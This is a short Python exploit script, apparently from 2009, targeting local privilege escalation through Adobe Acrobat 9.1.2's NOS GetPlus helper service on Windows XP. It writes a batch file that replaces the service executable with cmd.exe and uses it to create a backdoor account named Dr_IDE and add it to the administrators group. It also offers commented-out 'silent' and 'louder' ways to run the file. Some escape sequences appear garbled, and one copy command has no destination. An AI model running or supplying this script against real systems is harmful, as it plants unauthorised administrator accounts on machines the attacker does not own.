#!/usr/bin/env python
##################################################################################
#
# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
# Coded By: Dr_IDE
# Discovered by: Nine:Situations:Group
# Tested On: Windows XP SP2, Requires NOS Package Installed
# Usage: python Dr_IDE-Adobe_912.py
#
##################################################################################

import os, subprocess

#
# Should probably have a try block around this as not every install
# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
# play around with it.
#
# This is a super lame way to do this but it makes it more educational.
evil =  "echo *************************************************************n"
evil += "echo *n"
evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploitn"
evil += "echo * Coded By: Dr_IDEn"
evil += "echo * Discovered By: Nine:Situations:Groupn"
evil += "echo * Tested On: Windows XP SP2n"
evil += "echo *n"
evil += "echo *************************************************************n"
evil += "echo This will add user Dr_IDE:password to the Admin Groupn"
evil += "cd C:\Program Files\NOS\binn"
evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.oldn"
evil += "copy /Y %systemroot%\system32\cmd.exen"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADDn"
evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADDn"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDEn"
evil += "exit"

f1 = open('Dr_IDE-Adobe.bat','w');
f1.write(evil);
f1.close();

# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.

# Silent Way - This should be more stealthy
#retval = subprocess.call("Dr_IDE-Adobe.bat");

# Louder Way - On some systems this will probably open a DOS window
#retval = os.system("Dr_IDE-Adobe.bat");

# www.Syue.com [2009-07-27]